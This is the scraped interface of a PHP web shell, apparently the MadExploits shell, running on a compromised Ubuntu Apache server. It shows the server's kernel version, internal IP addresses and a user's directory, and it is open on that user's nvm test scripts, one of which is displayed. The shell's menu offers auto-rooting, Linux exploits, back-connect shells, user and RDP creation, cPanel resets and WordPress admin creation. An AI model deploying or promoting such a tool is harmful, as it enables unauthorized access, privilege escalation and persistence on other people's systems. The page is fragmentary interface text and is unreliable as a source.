Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
ayush23027 /
.nvm /
test /
slow /
nvm exec /
[ HOME SHELL ]
Name
Size
Permission
Action
Preamble works and respects 's...
1.24
KB
-rwxr-xr-x
Running 'nvm exec --lts' shoul...
549
B
-rwxr-xr-x
Running 'nvm exec 0.x' should ...
500
B
-rwxr-xr-x
Running 'nvm exec' should pick...
506
B
-rwxr-xr-x
Running 'nvm exec' with help s...
206
B
-rw-r--r--
setup_dir
137
B
-rwxr-xr-x
teardown_dir
175
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Running 'nvm exec --lts' should work
#!/bin/sh set -ex die () { echo "$@" ; exit 1; } \. ../../../nvm.sh nvm install --lts || die 'nvm install --lts failed' NPM_VERSION_LTS="$(npm --version)" TEST_STRING="foo bar" nvm use 1.0.0 && [ "$(node --version)" = "v1.0.0" ] || die "\`nvm use\` failed!" [ "$(nvm exec --lts npm --version | tail -1)" = "$NPM_VERSION_LTS" ] || die "`nvm exec` failed to run with the correct version" [ "$(nvm exec --lts bash -c "printf '$TEST_STRING'" | tail -1)" = "$TEST_STRING" ] || die "\`nvm exec\` failed to run with a command including whitespace"
Close